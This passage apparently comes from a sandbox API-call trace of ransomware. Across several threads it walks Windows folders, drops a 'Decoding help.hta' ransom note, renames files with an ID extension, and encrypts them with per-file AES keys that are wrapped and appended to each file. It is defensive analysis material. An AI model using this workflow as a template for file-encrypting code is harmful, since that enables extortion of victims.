CloseHandle (hObject=0x1b8) returned 1 [0039.163] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.164] lstrcmpiW (lpString1="Decoding help.hta", lpString2="shoes perception.exe") returned -1 [0039.164] lstrlenW (lpString="shoes perception.exe") returned 20 [0039.164] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" [0039.164] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned 37 [0039.164] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\", lpString2="shoes perception.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe") returned="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe" [0039.164] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe") returned="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe" [0039.164] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe" (normalized: "c:\\program files (x86)\\google\\shoes perception.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\shoes perception.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\shoes perception.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0039.165] CreateFileMappingA (hFile=0x1b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1ac [0039.165] CryptAcquireContextA (in: phProv=0x4ccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4ccfcec*=0x5b0bd0) returned 1 [0039.166] CryptGenKey (in: hProv=0x5b0bd0, Algid=0x6610, dwFlags=0x1, phKey=0x4ccfce8 | out: phKey=0x4ccfce8*=0x5a52b0) returned 1 [0039.166] CryptExportKey (in: hKey=0x5a52b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4ccfbe4, pdwDataLen=0x4ccfce4 | out: pbData=0x4ccfbe4*, pdwDataLen=0x4ccfce4*=0x2c) returned 1 [0039.166] MapViewOfFile (hFileMappingObject=0x1ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.168] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4ccfbe4*, pdwDataLen=0x4ccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4ccfbe4*, pdwDataLen=0x4ccfcf8*=0x100) returned 1 [0039.168] CryptEncrypt (in: hKey=0x5a52b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x4ccfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x4ccfce4*=0x12800) returned 1 [0039.169] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.170] CloseHandle (hObject=0x1ac) returned 1 [0039.170] CryptDestroyKey (hKey=0x5a52b0) returned 1 [0039.170] CryptReleaseContext (hProv=0x5b0bd0, dwFlags=0x0) returned 1 [0039.170] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.171] WriteFile (in: hFile=0x1b8, lpBuffer=0x4ccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4ccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4ccfbe4*, lpNumberOfBytesWritten=0x4ccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.171] WriteFile (in: hFile=0x1b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4ccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4ccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.171] CloseHandle (hObject=0x1b8) returned 1 [0039.173] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\shoes perception.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.173] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4ccfd30 | out: lpFindFileData=0x4ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fff1f30, ftCreationTime.dwHighDateTime=0x1d4caba, ftLastAccessTime.dwLowDateTime=0x5ee29020, ftLastAccessTime.dwHighDateTime=0x1d49d5e, ftLastWriteTime.dwLowDateTime=0x5ee29020, ftLastWriteTime.dwHighDateTime=0x1d49d5e, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="shoes perception.exe", cAlternateFileName="SHOESP~1.EXE")) returned 0 [0039.173] FindClose (in: hFindFile=0x5a5330 | out: hFindFile=0x5a5330) returned 1 Thread: id = 39 os_tid = 0xad0 [0039.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*", lpFindFileData=0x4e0fd30 | out: lpFindFileData=0x4e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.124] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x4e0fd30 | out: lpFindFileData=0x4e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.124] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.124] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x4e0fd30 | out: lpFindFileData=0x4e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0039.124] lstrcmpW (lpString1=".", lpString2="AS OLEDB") returned -1 [0039.124] lstrcmpW (lpString1="..", lpString2="AS OLEDB") returned -1 [0039.124] lstrcmpiW (lpString1="windows", lpString2="AS OLEDB") returned 1 [0039.125] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*" [0039.125] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*") returned 52 [0039.125] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\", lpString2="AS OLEDB" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB" [0039.125] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*" [0039.126] GlobalMemoryStatus (in: lpBuffer=0x4e0fd10 | out: lpBuffer=0x4e0fd10) [0039.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9581ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0039.143] CloseHandle (hObject=0x1a4) returned 1 [0039.143] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x4e0fd30 | out: lpFindFileData=0x4e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0039.143] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 40 os_tid = 0xad4 [0039.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*.*", lpFindFileData=0x4f4fd30 | out: lpFindFileData=0x4f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.155] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x4f4fd30 | out: lpFindFileData=0x4f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.155] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.155] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.155] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x4f4fd30 | out: lpFindFileData=0x4f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.155] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Boot\\es-ES\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\*.*") returned="\\\\?\\C:\\Boot\\es-ES\\*.*" [0039.155] lstrlenW (lpString="\\\\?\\C:\\Boot\\es-ES\\*.*") returned 21 [0039.155] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\es-ES\\Decoding help.hta" [0039.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\Decoding help.hta" (normalized: "c:\\boot\\es-es\\decoding help.hta")) returned 0xffffffff [0039.155] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\Decoding help.hta" (normalized: "c:\\boot\\es-es\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.155] WriteFile (in: hFile=0x1ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4f4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.156] CloseHandle (hObject=0x1ac) returned 1 [0039.156] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.157] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.157] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.157] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\es-ES\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\*.*") returned="\\\\?\\C:\\Boot\\es-ES\\*.*" [0039.157] lstrlenW (lpString="\\\\?\\C:\\Boot\\es-ES\\*.*") returned 21 [0039.157] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" [0039.157] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" [0039.157] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.157] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x4f4fd30 | out: lpFindFileData=0x4f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.157] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 41 os_tid = 0xad8 [0039.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*", lpFindFileData=0x3d0fd30 | out: lpFindFileData=0x3d0fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5430 [0039.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.151] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3d0fd30 | out: lpFindFileData=0x3d0fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.151] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.152] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3d0fd30 | out: lpFindFileData=0x3d0fd30*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0039.152] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0039.152] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned 56 [0039.152] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta" [0039.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\decoding help.hta")) returned 0xffffffff [0039.152] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0039.152] WriteFile (in: hFile=0x1d4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3d0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3d0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.153] CloseHandle (hObject=0x1d4) returned 1 [0039.153] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.153] lstrcmpiW (lpString1="Decoding help.hta", lpString2="boot.sdi") returned 1 [0039.153] lstrlenW (lpString="boot.sdi") returned 8 [0039.153] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0039.153] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned 56 [0039.154] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="boot.sdi" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0039.154] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0039.154] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[ID]g9uZrLhJaygpwRm1[ID]" [0039.154] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.179] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0039.180] CreateFileMappingA (hFile=0x1d4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1ec [0039.180] CryptAcquireContextA (in: phProv=0x3d0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3d0fcec*=0x5a7c68) returned 1 [0039.180] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x3d0fce8 | out: phKey=0x3d0fce8*=0x5a5330) returned 1 [0039.180] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3d0fbe4, pdwDataLen=0x3d0fce4 | out: pbData=0x3d0fbe4*, pdwDataLen=0x3d0fce4*=0x2c) returned 1 [0039.180] MapViewOfFile (hFileMappingObject=0x1ec, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x47d0000 [0039.185] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d0fbe4*, pdwDataLen=0x3d0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3d0fbe4*, pdwDataLen=0x3d0fcf8*=0x100) returned 1 [0039.185] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x47d0000, pdwDataLen=0x3d0fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x47d0000*, pdwDataLen=0x3d0fce4*=0x100000) returned 1 [0041.041] UnmapViewOfFile (lpBaseAddress=0x47d0000) returned 1 [0041.054] CloseHandle (hObject=0x1ec) returned 1 [0041.055] CryptDestroyKey (hKey=0x5a5330) returned 1 [0041.055] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0041.055] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.055] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3d0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x3d0fbe4*, lpNumberOfBytesWritten=0x3d0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0041.056] WriteFile (in: hFile=0x1d4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3d0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3d0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0041.056] CloseHandle (hObject=0x1d4) returned 1 [0041.880] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0041.883] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3d0fd30 | out: lpFindFileData=0x3d0fd30*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0041.883] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0041.883] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned 56 [0041.883] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta" [0041.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Decoding help.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\decoding help.hta")) returned 0x1 [0041.883] lstrcmpiW (lpString1="Decoding help.hta", 